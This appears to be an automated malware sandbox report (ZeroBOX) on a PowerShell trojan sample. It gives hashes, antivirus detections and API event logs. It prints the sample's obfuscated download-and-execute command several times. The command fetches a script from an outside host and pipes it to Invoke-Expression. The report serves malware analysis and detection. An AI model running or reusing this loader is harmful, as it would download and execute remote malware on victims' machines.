Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 24, 2025, 10:15 a.m.	April 24, 2025, 10:17 a.m.

Size	144.2KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`32250da721d1b4e5cc6d73f5b0f33d18`
SHA256	`b71fb29837da4f63cc8b34471d62468be3f5baa7acc4fbc22930153b50047a55`
CRC32	`FF4C1718`
ssdeep	`12:gzmzizl+tzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGs:8+T`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\hpkekeyconfig.txt.ps1
2548
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex unrestricted -c Set-Item Variable:/Ce ([Net.WebClient]::New());Set-Variable 7 'https://q.cylinderacronym.top/hpkekeyconfig';(Get-Variable Ce -ValueOn).(((([Net.WebClient]::New()|Member)|?{$_.Name -like'*nl*g'}).Name))((Variable 7 -Val))|&(Alias I*X)
  2712

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 24, 2025, 10:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2025, 10:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2025, 10:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2025, 10:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 24, 2025, 10:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 24, 2025, 10:15 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 24, 2025, 10:15 a.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: At line:1 char:203 console_handle: 0x0000002f	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: + Set-Item Variable:/Ce ([Net.WebClient]::New());Set-Variable 7 'https://q.cyli console_handle: 0x0000003b	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: nderacronym.top/hpkekeyconfig';(Get-Variable Ce -ValueOn).(((([Net.WebClient]:: console_handle: 0x00000047	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: New()\|Member)\|?{$_.Name -like'nlg'}).Name))( <<<< (Variable 7 -Val))\|&(Alias console_handle: 0x00000053	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: I*X) console_handle: 0x0000005f	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x0000006b	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: ecordException console_handle: 0x00000077	1	1
WriteConsoleW April 24, 2025, 10:15 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ece60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecc20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecfe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecfe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ecfe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 24, 2025, 10:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ed7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 24, 2025, 10:15 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 144 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02289000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02683000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02684000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02686000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 24, 2025, 10:15 a.m.	process_identifier: 2712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex unrestricted -c Set-Item Variable:/Ce ([Net.WebClient]::New());Set-Variable 7 'https://q.cylinderacronym.top/hpkekeyconfig';(Get-Variable Ce -ValueOn).(((([Net.WebClient]::New()\|Member)\|?{$_.Name -like'nlg'}).Name))((Variable 7 -Val))\|&(Alias I*X)
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex unrestricted -c Set-Item Variable:/Ce ([Net.WebClient]::New());Set-Variable 7 'https://q.cylinderacronym.top/hpkekeyconfig';(Get-Variable Ce -ValueOn).(((([Net.WebClient]::New()\|Member)\|?{$_.Name -like'nlg'}).Name))((Variable 7 -Val))\|&(Alias I*X)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 24, 2025, 10:15 a.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -ex unrestricted -c Set-Item Variable:/Ce ([Net.WebClient]::New());Set-Variable 7 'https://q.cylinderacronym.top/hpkekeyconfig';(Get-Variable Ce -ValueOn).(((([Net.WebClient]::New()\|Member)\|?{$_.Name -like'nlg'}).Name))((Variable 7 -Val))\|&(Alias I*X) filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1	0

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Kaspersky	Trojan.PowerShell.Agent.aoo
alibabacloud	Trojan:Win/Agent.aad

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 24, 2025, 10:15 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex unrestricted -c Set-Item Variable:/Ce ([Net.WebClient]::New());Set-Variable 7 'https://q.cylinderacronym.top/hpkekeyconfig';(Get-Variable Ce -ValueOn).(((([Net.WebClient]::New()\|Member)\|?{$_.Name -like'nlg'}).Name))((Variable 7 -Val))\|&(Alias I*X)
